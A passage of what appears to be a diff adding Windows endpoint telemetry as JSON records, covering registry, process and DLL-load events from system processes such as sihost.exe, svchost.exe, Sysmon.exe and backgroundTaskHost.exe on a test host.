"sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + 
"registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HostActivityManager", + "registry_value": "HostActivityManager", + "timestamp": 131883571688710000, + "unique_pid": 
"{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HostActivityManager", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HostActivityManager\\Volatile", + "registry_value": "Volatile", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": 
"sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\VolatileNotifications", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\VolatileNotifications\\41C64E6DA30CB855", + "registry_value": "41C64E6DA30CB855", + "timestamp": 
131883571688860000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\backgroundTaskHost.exe\" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca", + "event_type": "process", + "logon_id": 217097, + "parent_process_name": "svchost.exe", + "parent_process_path": "C:\\Windows\\System32\\svchost.exe", + "pid": 6376, + "ppid": 780, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "subtype": "create", + "timestamp": 131883571688960000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}", + "unique_ppid": "{42FC7E13-B293-5C05-0000-0010FAC80000}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571688860000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571688860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571688860000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + 
"image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571688860000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 
131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571689020000, 
+ "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "backgroundTaskHost.exe", + "image_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571688860000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + 
"image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "twinapi.appcore.dll", + "image_path": "C:\\Windows\\System32\\twinapi.appcore.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "rmclient.dll", + "image_path": "C:\\Windows\\System32\\rmclient.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571689180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689180000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 6376, 